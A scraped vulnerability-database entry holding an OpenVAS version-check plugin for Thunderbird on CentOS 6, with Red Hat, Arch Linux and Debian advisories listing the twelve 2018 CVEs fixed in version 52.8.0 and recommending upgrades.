CentOS Update for thunderbird CESA-2018:1726 centos6
2018-05-30T00:00:00
ID OPENVAS:1361412562310882891 Type openvas Reporter Copyright (C) 2018 Greenbone Networks GmbH Modified 2019-03-08T00:00:00
Description
Check the version of thunderbird
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_CESA-2018_1726_thunderbird_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $
#
# CentOS Update for thunderbird CESA-2018:1726 centos6
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.882891");
script_version("$Revision: 14058 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $");
script_tag(name:"creation_date", value:"2018-05-30 05:46:51 +0200 (Wed, 30 May 2018)");
script_cve_id("CVE-2018-5150", "CVE-2018-5154", "CVE-2018-5155", "CVE-2018-5159",
"CVE-2018-5161", "CVE-2018-5162", "CVE-2018-5168", "CVE-2018-5170",
"CVE-2018-5178", "CVE-2018-5183", "CVE-2018-5184", "CVE-2018-5185");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"qod_type", value:"package");
script_name("CentOS Update for thunderbird CESA-2018:1726 centos6");
script_tag(name:"summary", value:"Check the version of thunderbird");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Mozilla Thunderbird is a standalone mail and newsgroup client.
This update upgrades Thunderbird to version 52.8.0.
Security Fix(es):
* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8
(CVE-2018-5150)
* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)
* Mozilla: Use-after-free with SVG animations and clip paths
(CVE-2018-5154)
* Mozilla: Use-after-free with SVG animations and text paths
(CVE-2018-5155)
* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)
* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext attack
(CVE-2018-5184)
* Mozilla: Hang via malformed headers (CVE-2018-5161)
* Mozilla: Encrypted mail leaks plaintext through src attribute
(CVE-2018-5162)
* Mozilla: Lightweight themes can be installed without user interaction
(CVE-2018-5168)
* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)
* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion
through legacy extension (CVE-2018-5178)
* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Red Hat would like to thank the Mozilla project for reporting
CVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159, CVE-2018-5168,
CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges Christoph Diehl,
Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector,
Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Ivan Fratric,
Wladimir Palant, and Root Object as the original reporters.");
script_tag(name:"affected", value:"thunderbird on CentOS 6");
script_tag(name:"solution", value:"Please install the updated packages.");
script_xref(name:"CESA", value:"2018:1726");
script_xref(name:"URL", value:"http://lists.centos.org/pipermail/centos-announce/2018-May/022846.html");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2018 Greenbone Networks GmbH");
script_family("CentOS Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/centos", "ssh/login/rpms", re:"ssh/login/release=CentOS6");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release)
exit(0);
res = "";
if(release == "CentOS6")
{
if ((res = isrpmvuln(pkg:"thunderbird", rpm:"thunderbird~52.8.0~2.el6.centos", rls:"CentOS6")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310882891", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for thunderbird CESA-2018:1726 centos6", "description": "Check the version of thunderbird", "published": "2018-05-30T00:00:00", "modified": "2019-03-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882891", "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2018-May/022846.html", "2018:1726"], "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "lastseen": "2019-05-29T18:33:27", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2018:1415", "RHSA-2018:1725", "RHSA-2018:1414", "RHSA-2018:1726"]}, {"type": "archlinux", "idList": ["ASA-201805-21"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4209-1:C4F7E", "DEBIAN:DLA-1382-1:5626B", "DEBIAN:DSA-4199-1:E3C0E", "DEBIAN:DLA-1376-1:AF8F6"]}, {"type": "centos", "idList": ["CESA-2018:1414", "CESA-2018:1726", "CESA-2018:1415", "CESA-2018:1725"]}, {"type": "ubuntu", "idList": ["USN-3660-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-1414", "ELSA-2018-1415", "ELSA-2018-1725", "ELSA-2018-1726"]}, {"type": "amazon", "idList": ["ALAS2-2018-1032"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2018-1725.NASL", "ORACLELINUX_ELSA-2018-1725.NASL", "NEWSTART_CGSL_NS-SA-2019-0136_THUNDERBIRD.NASL", "SL_20180524_THUNDERBIRD_ON_SL7_X.NASL", "CENTOS_RHSA-2018-1726.NASL", "SL_20180524_THUNDERBIRD_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2018-1726.NASL", "REDHAT-RHSA-2018-1726.NASL", "DEBIAN_DSA-4209.NASL", "UBUNTU_USN-3660-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891382", "OPENVAS:1361412562310812891", "OPENVAS:1361412562310851753", "OPENVAS:1361412562310882889", "OPENVAS:1361412562310843537", "OPENVAS:1361412562310812892", "OPENVAS:1361412562310882879", "OPENVAS:1361412562310704199", "OPENVAS:1361412562310704209", "OPENVAS:1361412562310851740"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1361-1", "OPENSUSE-SU-2018:1359-1", "OPENSUSE-SU-2018:1212-1"]}, {"type": "kaspersky", "idList": ["KLA11251", "KLA11246"]}, {"type": "cve", "idList": ["CVE-2018-5154", "CVE-2018-5185", "CVE-2018-5184", "CVE-2018-5161", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5168", "CVE-2018-5170", "CVE-2018-5155", "CVE-2018-5150"]}, {"type": "seebug", "idList": ["SSV:97332"]}, {"type": "gentoo", "idList": ["GLSA-201811-13"]}, {"type": "freebsd", "idList": ["5AEFC41E-D304-4EC8-8C82-824F84F08244"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147843"]}, {"type": "exploitdb", "idList": ["EDB-ID:44759"]}], "modified": "2019-05-29T18:33:27", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2019-05-29T18:33:27", "rev": 2}, "vulnersScore": 7.3}, "pluginID": "1361412562310882891", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1726_thunderbird_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for thunderbird CESA-2018:1726 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882891\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 05:46:51 +0200 (Wed, 30 May 2018)\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\",\n \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\",\n \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for thunderbird CESA-2018:1726 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es):\n\n * Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n * Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n * Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n * Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n * Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n * Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext attack\n(CVE-2018-5184)\n\n * Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n * Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n * Mozilla: Lightweight themes can be installed without user interaction\n(CVE-2018-5168)\n\n * Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n * Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n * Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159, CVE-2018-5168,\nCVE-2018-5178, and CVE-2018-5183. Upstream acknowledges Christoph Diehl,\nRandell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector,\nKannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Ivan Fratric,\nWladimir Palant, and Root Object as the original reporters.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1726\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022846.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~52.8.0~2.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}
{"redhat": [{"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5154", "CVE-2018-5155", "CVE-2018-5159", "CVE-2018-5161", "CVE-2018-5162", "CVE-2018-5168", "CVE-2018-5170", "CVE-2018-5178", "CVE-2018-5183", "CVE-2018-5184", "CVE-2018-5185"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext attack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute (CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting CVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159, CVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as the original reporters.", "modified": "2018-06-07T18:23:32", "published": "2018-05-24T22:29:56", "id": "RHSA-2018:1726", "href": "https://access.redhat.com/errata/RHSA-2018:1726", "type": "redhat", "title": "(RHSA-2018:1726) Important: thunderbird security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:52", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5154", "CVE-2018-5155", "CVE-2018-5159", "CVE-2018-5161", "CVE-2018-5162", "CVE-2018-5168", "CVE-2018-5170", "CVE-2018-5178", "CVE-2018-5183", "CVE-2018-5184", "CVE-2018-5185"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext attack (CVE-2018-5184)\n\n* Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n* Mozilla: Encrypted mail leaks plaintext through src attribute (CVE-2018-5162)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\n* Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting CVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159, CVE-2018-5168, CVE-2018-5178, and CVE-2018-5183. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Ivan Fratric, Wladimir Palant, and Root Object as the original reporters.", "modified": "2018-05-24T22:39:03", "published": "2018-05-24T22:29:53", "id": "RHSA-2018:1725", "href": "https://access.redhat.com/errata/RHSA-2018:1725", "type": "redhat", "title": "(RHSA-2018:1725) Important: thunderbird security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5154", "CVE-2018-5155", "CVE-2018-5157", "CVE-2018-5158", "CVE-2018-5159", "CVE-2018-5168", "CVE-2018-5178", "CVE-2018-5183"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 52.8.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Same-origin bypass of PDF Viewer to view protected PDF files (CVE-2018-5157)\n\n* Mozilla: Malicious PDF can inject JavaScript into PDF Viewer (CVE-2018-5158)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Wladimir Palant, Ivan Fratric, and Root Object as the original reporters.", "modified": "2018-06-07T18:21:55", "published": "2018-05-14T17:20:52", "id": "RHSA-2018:1414", "href": "https://access.redhat.com/errata/RHSA-2018:1414", "type": "redhat", "title": "(RHSA-2018:1414) Critical: firefox security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5154", "CVE-2018-5155", "CVE-2018-5157", "CVE-2018-5158", "CVE-2018-5159", "CVE-2018-5168", "CVE-2018-5178", "CVE-2018-5183"], "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 52.8.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8 (CVE-2018-5150)\n\n* Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n* Mozilla: Use-after-free with SVG animations and clip paths (CVE-2018-5154)\n\n* Mozilla: Use-after-free with SVG animations and text paths (CVE-2018-5155)\n\n* Mozilla: Same-origin bypass of PDF Viewer to view protected PDF files (CVE-2018-5157)\n\n* Mozilla: Malicious PDF can inject JavaScript into PDF Viewer (CVE-2018-5158)\n\n* Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n* Mozilla: Lightweight themes can be installed without user interaction (CVE-2018-5168)\n\n* Mozilla: Buffer overflow during UTF-8 to Unicode string conversion through legacy extension (CVE-2018-5178)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christoph Diehl, Randell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector, Kannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Wladimir Palant, Ivan Fratric, and Root Object as the original reporters.", "modified": "2018-05-14T18:15:26", "published": "2018-05-14T17:22:39", "id": "RHSA-2018:1415", "href": "https://access.redhat.com/errata/RHSA-2018:1415", "type": "redhat", "title": "(RHSA-2018:1415) Critical: firefox security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5154", "CVE-2018-5155", "CVE-2018-5159", "CVE-2018-5161", "CVE-2018-5162", "CVE-2018-5168", "CVE-2018-5170", "CVE-2018-5178", "CVE-2018-5183", "CVE-2018-5184", "CVE-2018-5185"], "description": "Arch Linux Security Advisory ASA-201805-21\n==========================================\n\nSeverity: Critical\nDate : 2018-05-21\nCVE-ID : CVE-2018-5150 CVE-2018-5154 CVE-2018-5155 CVE-2018-5159\nCVE-2018-5161 CVE-2018-5162 CVE-2018-5168 CVE-2018-5170\nCVE-2018-5178 CVE-2018-5183 CVE-2018-5184 CVE-2018-5185\nPackage : thunderbird\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-707\n\nSummary\n=======\n\nThe package thunderbird before version 52.8.0-1 is vulnerable to\nmultiple issues including arbitrary code execution, information\ndisclosure, access restriction bypass, content spoofing and denial of\nservice.\n\nResolution\n==========\n\nUpgrade to 52.8.0-1.\n\n# pacman -Syu \"thunderbird>=52.8.0-1\"\n\nThe problems have been fixed upstream in version 52.8.0.\n\nWorkaround\n==========\n\nMost of these issues can be mitigated by viewing e-mails in plain text\nmode, via the \"View\", \"Message Body As\", \"Plain Text\" menus.\n\nDescription\n===========\n\n- CVE-2018-5150 (arbitrary code execution)\n\nSeveral memory safety bugs have been found in Firefox before 60.0 and\nThunderbird before 52.8. Some of these bugs showed evidence of memory\ncorruption and Mozilla presumes that with enough effort some of these\ncould be exploited to run arbitrary code.\n\n- CVE-2018-5154 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in Firefox < 60.0 and\nThunderbird < 52.8, while enumerating attributes during SVG animations\nwith clip paths.\n\n- CVE-2018-5155 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in Firefox < 60.0 and\nThunderbird < 52.8, while adjusting layout during SVG animations with\ntext paths.\n\n- CVE-2018-5159 (arbitrary code execution)\n\nAn integer overflow vulnerability has been found in the Skia library\nused in Firefox < 60.0 and Thunderbird < 52.8, due to 32-bit integer\nuse in an array without integer overflow checks, resulting in possible\nout-of-bounds writes. This could lead to a potentially exploitable\ncrash triggerable by web content.\n\n- CVE-2018-5161 (denial of service)\n\nA security issue has been found in Thunderbird before 52.8, where\ncrafted message headers can cause a Thunderbird process to hang on\nreceiving the message.\n\n- CVE-2018-5162 (information disclosure)\n\nA security issue has been found in Thunderbird before 52.8, where\nplaintext of decrypted emails can leak through the src attribute of\nremote images, or links.\n\n- CVE-2018-5168 (access restriction bypass)\n\nSites can bypass security checks on permissions to install lightweight\nthemes in Firefox before 60.0 and Thunderbird before 52.8, by\nmanipulating the baseURI property of the theme element. This could\nallow a malicious site to install a theme without user interaction\nwhich could contain offensive or embarrassing images.\n\n- CVE-2018-5170 (content spoofing)\n\nIt is possible in Thunderbird before 52.8 to spoof the filename of an\nattachment and display an arbitrary attachment name. This could lead to\na user opening a remote attachment which is a different file type than\nexpected.\n\n- CVE-2018-5178 (information disclosure)\n\nA buffer overflow was found in Thunderbird before 52.8, during UTF8 to\nUnicode string conversion within JavaScript with extremely large\namounts of data. This vulnerability requires the use of a malicious or\nvulnerable legacy extension in order to occur.\n\n- CVE-2018-5183 (arbitrary code execution)\n\nSeveral memory corruption issues including invalid buffer reads and\nwrites during graphic operations have been found in the Skia library.\n\n- CVE-2018-5184 (information disclosure)\n\nA security issue has been found in Thunderbird before 52.8, where using\nremote content in S/MIME encrypted messages can lead to the disclosure\nof plaintext via chosen-ciphertext attack.\n\n- CVE-2018-5185 (information disclosure)\n\nA security issue has been found in Thunderbird before 52.8, where\nplaintext of decrypted emails can leak through by user submitting an\nembedded form.\n\nImpact\n======\n\nA remote attacker might be able to access sensitive information via a\ncrafted encrypted e-mail, and spoof the name of an attachment. A remote\nattacker might also be able to access sensitive information, crash the\nprocess or execute arbitrary code via a crafted HTML e-mail if viewing\nHTML messages is enabled.\n\nReferences\n==========\n\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-11/#CVE-2018-5150\nhttps://bugzilla.mozilla.org/buglist.cgi?bug_id=1388020%2C1433609%2C1409440%2C1448705%2C1451376%2C1452202%2C1444668%2C1393367%2C1411415%2C1426129\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-11/#CVE-2018-5154\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1443092\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-11/#CVE-2018-5155\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1448774\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-11/#CVE-2018-5159\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1441941\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/#CVE-2018-5161\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1411720\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/#CVE-2018-5162\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1457721\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-11/#CVE-2018-5168\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1449548\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/#CVE-2018-5170\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1411732\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/#CVE-2018-5178\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1443891\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/#CVE-2018-5183\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1454692\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/#CVE-2018-5184\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1411592\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2018-13/#CVE-2018-5185\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1450345\nhttps://security.archlinux.org/CVE-2018-5150\nhttps://security.archlinux.org/CVE-2018-5154\nhttps://security.archlinux.org/CVE-2018-5155\nhttps://security.archlinux.org/CVE-2018-5159\nhttps://security.archlinux.org/CVE-2018-5161\nhttps://security.archlinux.org/CVE-2018-5162\nhttps://security.archlinux.org/CVE-2018-5168\nhttps://security.archlinux.org/CVE-2018-5170\nhttps://security.archlinux.org/CVE-2018-5178\nhttps://security.archlinux.org/CVE-2018-5183\nhttps://security.archlinux.org/CVE-2018-5184\nhttps://security.archlinux.org/CVE-2018-5185", "modified": "2018-05-21T00:00:00", "published": "2018-05-21T00:00:00", "id": "ASA-201805-21", "href": "https://security.archlinux.org/ASA-201805-21", "type": "archlinux", "title": "[ASA-201805-21] thunderbird: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-10-17T13:49:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4209-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMay 25, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : thunderbird\nCVE ID : CVE-2018-5150 CVE-2018-5154 CVE-2018-5155 CVE-2018-5159 \n CVE-2018-5161 CVE-2018-5162 CVE-2018-5168 CVE-2018-5170 \n CVE-2018-5178 CVE-2018-5183 CVE-2018-5184 CVE-2018-5185\n\nMultiple security issues have been found in Thunderbird, which may lead\nto the execution of arbitrary code, denial of service or attacks on\nencrypted emails.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 1:52.8.0-1~deb8u1.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 1:52.8.0-1~deb9u1.\n\nWe recommend that you upgrade your thunderbird packages.\n\nFor the detailed security status of thunderbird please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/thunderbird\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently 